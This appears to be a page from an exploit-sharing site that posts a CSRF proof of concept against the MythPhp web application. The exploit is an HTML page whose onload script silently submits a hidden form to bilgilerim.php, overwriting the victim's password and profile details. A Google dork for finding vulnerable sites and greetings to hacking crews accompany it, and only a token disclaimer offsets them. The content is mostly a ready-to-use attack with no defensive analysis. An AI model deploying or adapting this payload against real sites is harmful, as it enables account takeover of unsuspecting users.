[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MythPhp CSRF Change User Password Vulnerability

Author
Caddy-Dz
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19526
Category
web applications
Date add
07-10-2012
Platform
php
<?php

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm Caddy-dz member from Inj3ct0r Team                 1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

####
# Exploit Title: MythPhp CSRF Change User Password Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com 
# Category:: webapps
# Vendor: http://mythphp.com
# Google Dork: inurl:bilgilerim.php
# Security Risk: High
# Tested on: Windows Seven Edition Integral / French
####


// Special Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3
// .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers .

// this was written for educational purpose only. use it at your own risk.
// author will be not responsible for any damage caused! user assumes all responsibility 
// intended for authorized web application pentesting only!
//
?>

<html>
<head>
 
</head>
 
<body onload="javascript:fireForms()">
<script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
	</script>
	
<form method="post" action="bilgilerim.php">
			<input name="musid" type="hidden" class="text" size="28" value="1" /><br />
			<input name="adsoyad" type="hidden" class="text" size="28" value="DEMO" /><br />
			<input name="telno" type="hidden" class="text" size="28" value="05064552370" /><br />
			<input name="mail" type="hidden" class="text" size="28" value="demo@mythphp.com" /><br />
			<input name="pass" type="hidden" class="text" size="28" value="123456" /><br />
			<input name="tcnum" type="hidden" class="text" size="28" value="12345678910" /><br />
		</form>
	</html>



#  0day.today [2024-09-20]  #